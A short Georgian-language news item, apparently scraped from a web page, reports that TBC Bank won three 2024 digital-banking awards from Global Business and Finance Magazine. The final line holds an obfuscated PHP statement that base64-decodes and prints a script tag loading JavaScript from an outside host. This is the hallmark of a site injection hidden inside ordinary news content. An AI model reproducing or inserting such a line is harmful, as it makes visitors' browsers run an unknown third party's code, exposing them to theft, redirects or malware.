celsiusi
ავერსი საქკაბელი

 გავლენიანმა საერთაშორისო ბიზნეს გამოცემა Global Business and Finance Magazine-მა ყოველწლიური შედეგები გამოაქვეყნა. 2024 წელს „თიბისიმ“ როგორც ქვეყნის, ისე რეგიონის მასშტაბით, განსაკუთრებულ აღიარებას 3 ნომინაციაში მიაღწია. ამის შესახებ ინფორმაციას „თიბისი“ ბანკი ავრცელებს.

მათი ცნობით, Global Business and Finance Magazine რეგულარულად აჯილდოებს საუკეთესო შედეგების მქონე ბანკებსა და ფინანსური სერვისების სხვა მიმწოდებლებს. მსოფლიოს ფინანსური საზოგადოებისთვის კი, Global Business and Finance Magazine-ის ჯილდოები საბანკო საქმიანობის შეფასების სანდო და ობიექტური სტანდარტია.

„თიბისიმ“ როგორც ქვეყნის, ისე რეგიონის მასშტაბით, განსაკუთრებულ აღიარებას 3 ნომინაციაში მიაღწია, ესენია: საუკეთესო მობაილბანკი საქართველოში - Best Digital Bank Georgia

წლის საუკეთესო მობაილბანკინგის ბრენდი საქართველოში - Best Digital Banking Brand Of The Year Georgia

ყველაზე ინოვაციური მობაილბანკი საქართველოში - Most Innovative Digital Bank Georgia

„თიბისისთვის“, როგორც ტექნოლოგიური კომპანიისთვის ციფრული სერვისების განვითარება და დახვეწა პრიორიტეტია. სწორედ ამიტომ, ძალიან მნიშვნელოვანია, რომ გამოცემამ „თიბისი“ წარმატებული ინიციატივებისთვის 3 ნომინაციაში დააჯილდოვა“,- ნათქვამია ინფორმაციაში.

112
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");